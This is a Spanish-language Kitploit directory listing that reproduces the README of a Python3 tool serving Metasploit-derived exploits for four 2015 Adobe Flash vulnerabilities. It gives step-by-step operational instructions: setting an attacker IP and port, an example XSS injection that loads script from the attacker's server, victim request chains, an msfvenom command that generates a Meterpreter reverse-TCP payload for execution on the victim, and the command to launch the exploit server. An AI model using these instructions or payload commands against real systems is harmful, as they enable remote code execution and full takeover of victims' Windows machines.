Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Adobe-Flash-Exploits_17-18 — Exploits de Metasploit convertidos para las vulnerabilidades de Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 y CVE-2015-5122 a un script de Python3. | Kitploit
Herramientas/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
Frameworks de ExploitsGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Exploits de Metasploit convertidos para las vulnerabilidades de Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 y CVE-2015-5122 a un script de Python3.

Ver Repositorio
11hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Script de Python3 para exploits de Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 y CVE-2015-5122

Exploits de Metasploit convertidos para las vulnerabilidades de Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 y CVE-2015-5122 a un script de Python3.

Información

Este script alojará un servidor web que puede explotar una de las siguientes vulnerabilidades de Adobe Flash a la vez:

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

Ejecución

Debes realizar cambios (descritos aquí) en exploit.py para adaptarlos a tus necesidades.

Modificaciones

  • hostname = "192.168.1.100"
    • Esta es una IP en el sistema atacante que alojará el servidor web de explotación.
  • serverPort = 8080
    • Este es el puerto en el sistema atacante que alojará el servidor web de explotación.
  • xss = False
    • Si se establece en True, la primera solicitud de la víctima al servidor se trata como JavaScript:
      • Ejemplo de inyección XSS:
        • <script src="http://192.168.1.100:8080/"></script>
      • Ruta de ataque:
        • Solicitud 1 de la víctima -> Servidor vulnerable a XSS:
          • La víctima accede a la inyección XSS en un servidor remoto que solicita un archivo JavaScript (ver solicitud 2).
        • Solicitud 2 de la víctima -> Recurso JavaScript en el sistema atacante.
        • Solicitud 3 de la víctima -> Archivo swf malicioso.
    • Si se establece en False, la primera solicitud de la víctima al servidor se trata como HTML:
      • Ejemplo:
        • http://192.168.1.100:8080/
      • Ruta de ataque:
        • Solicitud 1 de la víctima -> Archivo HTML en el sistema atacante.
        • Solicitud 2 de la víctima -> Archivo swf malicioso.
  • base64Payload = "..."
    • Este es el payload base64 que se ejecutará en el sistema de la víctima.
    • Modifica el comando de ejemplo a continuación para adaptarlo a tus necesidades y genera tu payload:
      • Ejemplo:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • Nota: El único payload que me ha funcionado es windows/meterpreter/reverse_tcp.

  • swfFile = swfFileList['37368']
    • Selecciona el archivo swf de exploit de Adobe Flash para explotar el sistema de la víctima:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        
  • Ejecutar

    Ejecuta el siguiente comando, en el mismo directorio que los archivos swf maliciosos, para ejecutar el script de exploit de Adobe Flash:

    • python3 exploit.py

    Referencias:

    CVE-2015-3090 -> https://exploit-db.com/exploits/37368

    CVE-2015-3105 -> https://exploit-db.com/exploits/37448

    CVE-2015-5119 -> https://exploit-db.com/exploits/37523

    CVE-2015-5122 -> https://exploit-db.com/exploits/37599

    Descargar herramienta